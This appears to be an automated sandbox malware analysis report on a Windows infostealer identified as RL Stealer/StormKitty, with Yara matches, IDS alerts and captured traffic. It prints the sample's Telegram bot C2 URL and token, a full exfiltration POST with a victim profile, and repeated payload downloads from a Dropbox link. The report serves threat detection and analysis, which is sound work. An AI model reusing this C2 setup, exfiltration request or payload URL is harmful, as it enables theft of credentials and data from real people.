Edit tour

Windows Analysis Report
vEtDFkAZjO.exe

Overview

General Information

Sample name:	vEtDFkAZjO.exe renamed because original name is a hash value
Original sample name:	3d5021b656dcb39863d39430a4eddb5d6eb0e177.exe
Analysis ID:	1582808
MD5:	1b8dac31eb30bd909fadcd9738c832ca
SHA1:	3d5021b656dcb39863d39430a4eddb5d6eb0e177
SHA256:	80f34efce3765a4e57c2f333981112bff3788633bd515fa48b6eb16b88113660
Tags:	exeuser-NDA0E
Infos:

Detection

RL STEALER, StormKitty

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected RL STEALER

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Drops password protected ZIP file

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious desktop.ini Action

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

vEtDFkAZjO.exe (PID: 6624 cmdline: "C:\Users\user\Desktop\vEtDFkAZjO.exe" MD5: 1B8DAC31EB30BD909FADCD9738C832CA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendMessage"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
vEtDFkAZjO.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
vEtDFkAZjO.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
vEtDFkAZjO.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
vEtDFkAZjO.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
vEtDFkAZjO.exe	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
vEtDFkAZjO.exe	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0xaa3:$sk01: LimerBoy/StormKitty 0x3a016:$str01: set_sUsername 0x3a416:$str02: set_sIsSecure 0x3b8ea:$str03: set_sExpMonth 0x3d9ae:$str04: WritePasswords 0x3db97:$str05: WriteCookies 0x3e1e4:$str06: sChromiumPswPaths 0x3e1d1:$str07: sGeckoBrowserPaths 0x49341:$str08: Username: {1} 0x4935d:$str09: Password: {2} 0x4b82d:$str10: encrypted_key":"(.*?)"
vEtDFkAZjO.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47754:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
vEtDFkAZjO.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a797:$s1: \VPN\NordVPN 0x4a83b:$s1: \VPN\NordVPN 0x4a8fb:$s2: \VPN\OpenVPN 0x4a969:$s3: \VPN\ProtonVPN
vEtDFkAZjO.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49b8e:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b5f9:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b82b:$s6: "encrypted_key":"(.*?)"
vEtDFkAZjO.exe	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x475a5:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4ac67:$s11: \Ethereum\keystore 0x45ca2:$v1_5: sharedSecret 0x4889c:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47554:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3a958:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: vEtDFkAZjO.exe PID: 6624	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: vEtDFkAZjO.exe PID: 6624	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vEtDFkAZjO.exe PID: 6624	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vEtDFkAZjO.exe PID: 6624	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
Process Memory Space: vEtDFkAZjO.exe PID: 6624	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x4a6b3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x6f43f:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.vEtDFkAZjO.exe.760000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.0.vEtDFkAZjO.exe.760000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.vEtDFkAZjO.exe.760000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.vEtDFkAZjO.exe.760000.0.unpack	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
0.0.vEtDFkAZjO.exe.760000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0xaa3:$sk01: LimerBoy/StormKitty 0x3a016:$str01: set_sUsername 0x3a416:$str02: set_sIsSecure 0x3b8ea:$str03: set_sExpMonth 0x3d9ae:$str04: WritePasswords 0x3db97:$str05: WriteCookies 0x3e1e4:$str06: sChromiumPswPaths 0x3e1d1:$str07: sGeckoBrowserPaths 0x49341:$str08: Username: {1} 0x4935d:$str09: Password: {2} 0x4b82d:$str10: encrypted_key":"(.*?)"
0.0.vEtDFkAZjO.exe.760000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47754:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.0.vEtDFkAZjO.exe.760000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a797:$s1: \VPN\NordVPN 0x4a83b:$s1: \VPN\NordVPN 0x4a8fb:$s2: \VPN\OpenVPN 0x4a969:$s3: \VPN\ProtonVPN
0.0.vEtDFkAZjO.exe.760000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49b8e:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b5f9:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b82b:$s6: "encrypted_key":"(.*?)"
0.0.vEtDFkAZjO.exe.760000.0.unpack	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x475a5:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4ac67:$s11: \Ethereum\keystore 0x45ca2:$v1_5: sharedSecret 0x4889c:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\vEtDFkAZjO.exe, ProcessId: 6624, TargetFilename: C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\desktop.ini

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T15:02:25.265574+0100	2803305	3	Unknown Traffic	192.168.2.9	49710	162.125.66.15	443	TCP
2024-12-31T15:02:25.348738+0100	2803305	3	Unknown Traffic	192.168.2.9	49711	162.125.66.15	443	TCP
2024-12-31T15:02:26.535935+0100	2803305	3	Unknown Traffic	192.168.2.9	49712	162.125.66.15	443	TCP
2024-12-31T15:02:26.676407+0100	2803305	3	Unknown Traffic	192.168.2.9	49713	162.125.66.15	443	TCP
2024-12-31T15:02:27.856610+0100	2803305	3	Unknown Traffic	192.168.2.9	49714	162.125.66.15	443	TCP
2024-12-31T15:02:28.650124+0100	2803305	3	Unknown Traffic	192.168.2.9	49715	162.125.66.15	443	TCP
2024-12-31T15:02:30.716270+0100	2803305	3	Unknown Traffic	192.168.2.9	49719	162.125.66.15	443	TCP
2024-12-31T15:02:31.963126+0100	2803305	3	Unknown Traffic	192.168.2.9	49720	162.125.66.15	443	TCP
2024-12-31T15:02:33.195681+0100	2803305	3	Unknown Traffic	192.168.2.9	49721	162.125.66.15	443	TCP
2024-12-31T15:02:34.967076+0100	2803305	3	Unknown Traffic	192.168.2.9	49724	208.95.112.1	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T15:02:37.393078+0100	2843864	1	A Network Trojan was detected	192.168.2.9	49727	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T15:02:37.391192+0100	1810008	1	Potentially Bad Traffic	192.168.2.9	49727	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: vEtDFkAZjO.exe

Avira: detected

Found malware configuration

Source: vEtDFkAZjO.exe.6624.0.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendMessage"}

Multi AV Scanner detection for submitted file

Source: vEtDFkAZjO.exe	Virustotal: Detection: 69%			Perma Link
Source: vEtDFkAZjO.exe	ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: vEtDFkAZjO.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: freegeoip.app

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File created: C:\Users\user\AppData\Local\138727\InstalledSoftware.txt

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49727 version: TLS 1.2

Source: vEtDFkAZjO.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: vEtDFkAZjO.exe, 00000000.00000002.1618907198.0000000006180000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then jmp 01015989h	0_2_010156F8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then jmp 01019B94h	0_2_01019950
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then jmp 01015F19h	0_2_01015D7D
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then jmp 01014115h	0_2_01013C98
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then inc dword ptr [ebp-30h]	0_2_010187E0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then inc dword ptr [ebp-24h]	0_2_0101C8B0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then jmp 01335E32h	0_2_01335D58
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 4x nop then mov eax, dword ptr [ebp-0Ch]	0_2_013309C8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49727 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.9:52799 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=%207424669291&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2012/31/2024%209:02%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20138727%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.189%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%201%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2a1a13562e73Host: api.telegram.orgContent-Length: 719778Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49724 -> 208.95.112.1:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49710 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49719 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49714 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49721 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49720 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49711 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49715 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49713 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49712 -> 162.125.66.15:443

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: freegeoip.app
Source: global traffic	DNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: ipbase.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=%207424669291&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2012/31/2024%209:02%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20138727%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.189%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%